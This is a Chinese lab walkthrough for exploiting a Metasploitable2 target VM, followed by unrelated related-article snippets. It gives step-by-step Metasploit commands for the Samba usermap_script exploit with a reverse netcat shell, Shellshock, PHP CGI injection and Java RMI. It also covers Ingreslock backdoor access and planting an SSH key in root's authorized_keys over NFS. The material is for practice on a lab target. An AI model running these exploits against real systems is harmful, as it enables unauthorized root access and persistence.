准备:直接用一个工具包,在虚拟机上直接打开Linux环境。此虚拟机为靶机。

账号:msfadmin        密码:msfadmin

设权限sudo passwd root      改root密码:msfadmin

切换权限:su root      输密码:msfafmin

重启网卡:/etc/init.d/networking restart

xshell连接地址:192.168.1.103(桥接)

一、利用samba 服务漏洞入侵linux主机(samba低版本),对应端口:139、445

靶机IP:192.168.1.103

查看本地服务:netstat -lnt

结合nessus扫描本机的结果出现的漏洞,进行攻击。

攻击机:kali,IP:10.0.0.9

1.msfconsole

search samba

use exploit/multi/samba/usermap_script

set payload cmd/unix/reverse_netcat

show options

set rhosts 192.168.1.103

exploit

成功后可在本地直接输入命令操控对方。

二、CVE-2014-6271       Bash Shellshock(破壳)

Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。在有些CGI脚本的设计中,数据是通过环境变量来传递的,这样就给了数据提供者利用Shellshock漏洞的机会。简单来说就是由于服务器的cgi脚本调用了bash命令,由于bash版本过低,攻击者把有害数据写入环境变量,传到服务器端,触发服务器运行Bash脚本,完成攻击。cgi格式文件是“公共网关接口脚本”类型文件。

1.准备环境

靶机:metasploitable2(kali)系统,IP:192.168.1.103。

攻击机:kali,IP:10.0.0.9。
2.靶机上面

cd /usr/lib/cgi-bin/

(创建hello.sh文件:)

sudo nano hello.sh

(ctrl+x退出)(用vim对hello.sh脚本进行编辑:vim hello.sh)

#! /bin/bash

echo "Content-type: text/html"

echo ""

echo "Hello world!"

(:wq保存)

(保存好后,赋予脚本可执行权限,使用chmod命令:)

sudo chmod 755 hello.sh

(通过浏览器访问该脚本,可以看到成功执行,可以攻击)

http://192.168.1.103/cgi-bin/hello.sh

3.进入攻击机msfconsole。

search CVE-2014-6271

use exploit/multi/http/apache_mod_cgi_bash_env_exec

show options

set rhost 192.168.1.103

set targeturi /cgi-bin/hello.sh

exploit

三、PHP CGI漏洞

1.准备环境

靶机:同上

攻击机kali,IP:10.0.0.9。

2.search cve:2012-1823

use exploit/multi/http/php_cgi_arg_injection

show options

set rhost 192.168.1.103

exploit

四、Java RMI SERVER 命令执行漏洞与java cve-2013-0422

nmap –p 0-65535 IP       #查看1099端口是否开启

use exploit/multi/misc/java_rmi_server

五、Ingreslock  后门

原理:Ingreslock后门监听1524端口,连接1524端口就可以直接提取root权限。

验证:在本地机上   Telnet 192.168.1.103 1524

六、NFS Exported Share Information Disclosure

rpcinfo -p 192.168.1.103                     #显示本地系统中注册到rpcbind协议版本2的所有RPC服务

showmount -e 192.168.1.103               #显示被挂载的共享目录

ssh-keygen                                            #生成密钥

默认密钥保存地址  (/root/.ssh/id_rsa.pub)

mkdir /tmp/test

mount -t nfs 192.168.1.103:/ /tmp/test

cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys

ssh root@192.168.1.103

相当于远程连接

漏洞利用六:Linux系统漏洞利用相关推荐

  1. 利用计算机漏洞运营商系统,浙江警方破获全国首起利用运营商系统漏洞实施帮信案...

    &nbsp&nbsp&nbsp&nbsp &nbsp&nbsp&nbsp&nbsp警方抓获湖北荆州微信号贩卖团伙.奚悦摄 &nb ...

  2. Linux系统上利用nmcli命令创建网络组

    网络组:是将多个网卡聚合在一起方法,从而实现冗错和提高吞吐量 网络组不同于旧版中bonding技术,提供更好的性能和扩展性 网络组由内核驱动和teamd守护进程实现. 下面我们以CentOS7系统为环 ...

  3. Linux 系统中利用 apt-get 管理软件的安装目录和安装路径

    Linux 系统中利用 apt-get 管理软件的安装目录和安装路径 apt-get 下载软件存放路径: /var/cache/apt/archives lib 文件路径: /usr/lib 可执行文 ...

  4. Linux系统漏洞复现分析,Linux环境下常见漏洞利用技术

    记得以前在drops写过一篇文章叫 linux常见漏洞利用技术实践 ,现在还可以找得到(https://woo.49.gs/static/drops/binary-6521.html), 不过当时开始 ...

  5. linux系统漏洞firefart,CVE-2016-5195脏牛Linux提权复现

    漏洞编号:CVE-2016-5195 影响范围: Linux kernel >= 2.6.22(2007年发行,到今年10月18日才修复) 漏洞影响:低权限用户利用该漏洞技术可以在全版本Linu ...

  6. linux系统漏洞测试过程,Linux下bash破壳漏洞检测方法

    如果Linux服务器存在bash破壳漏洞,将可能导致远程攻击者操作系统来执行任意命令,威胁等级较高,那么我们要怎么知道Linux系统是否存在该漏洞,又该如何修复呢?下面随学习啦小编一起来了解下吧. 问 ...

  7. Unix/Linux操作系统分析实验二 内存分配与回收:Linux系统下利用链表实现动态内存分配

    Unix/Linux操作系统分析实验一 进程控制与进程互斥 Unix/Linux操作系统分析实验三 文件操作算法: 实现在/proc目录下添加文件 Unix/Linux操作系统分析实验四 设备驱动: ...

  8. Linux系统漏洞扫描及中高危漏洞解决

    在项目即将上线的时候,很多甲方公司,需要对乙方公司开发的系统进行漏洞扫描, 其中 中高危的漏洞是必须要解决的,甲方才会让你的系统发布上线, 低危漏洞甲方不需要你马上解决,可暂时不用去管 这里列举一下楼 ...

  9. 几款Linux系统漏洞扫描、评估工具简介

    一.Nmap Nmap 是一种常用工具,可用于判定网络的布局.我们可以在网络上使用 Nmap 来查找主机系统以及打开这些系统的端口. 1. 安装Nmap. [root@GeekDevOps ~]# y ...

  10. 在Linux系统终端利用ggc,大学计算机:Linux下C编程.pdf

    第 1 章 编译与调试 1.1 编译的概念和理解 在进行 C 程序开发时,编译就是将编写的 C 语言代码变成可执行程序的过程,这一过程 是由编译器来完成的.编译器就是完成程序编译工作的软件,在进行程序 ...

最新文章

  1. 参加java培训,要避免这几个误区!
  2. Spring 面试问题 TOP 50
  3. 数学公式识别神器—Mathpix Snip
  4. python语言标识符首字符不能是汉字_Python基本语法元素
  5. 堆排序 C++代码实现及思想 排序过程输出 恋上数据结构笔记
  6. 计算机网络——速率相关的性能指标
  7. TreeView控件的基本使用 界面篇 winform
  8. HTML 元素和属性--备份
  9. QPushButton 与 QListWidget 的按键响应
  10. centos java 路径_CentOS JAVA安装及查看路径方法
  11. 2019 ,我的新年Flag
  12. eclipse 配置maven tomcat 环境
  13. pragma预处理指令详解
  14. APP响应时间和响应速度测试
  15. ipcs中的dest是什么意思
  16. [读书笔记]组件设计:补白[深入剖析ASP.NET组件设计]一书中HttpApplication对象创建的细节...
  17. 四级单词pdf_英语单词里的字母到底有没有含义?
  18. easyui打印功能实现打印解决方案
  19. 交互式视频h5_H5P:用于创建HTML5交互式内容的CMS插件
  20. vba中将数字数据转为数字格式_通过VBA将文本格式的时间转换为数字格式

热门文章

  1. 记录贴:学习Andorid开发
  2. 员工考勤iPhone客户端1.0版简介
  3. 2022年最佳WordPress企业主题
  4. 《从零开始做运营》1~2章 读书笔记
  5. 8.以微型计算机为中心,全国网络教育统一考试《计算机应用基础》复习要点
  6. Nature Biotechnol | 李家洋/余泓团队利用平铺删除策略打破性状连锁,突破水稻产量瓶颈...
  7. 会计核算的基本前提与确认计量的一般原则
  8. 计算机属于机器人相关专业,人工智能属于什么学科门类
  9. 再读《谁说大象不能跳舞》
  10. bootable_noemulation.img linux,Syslinux使用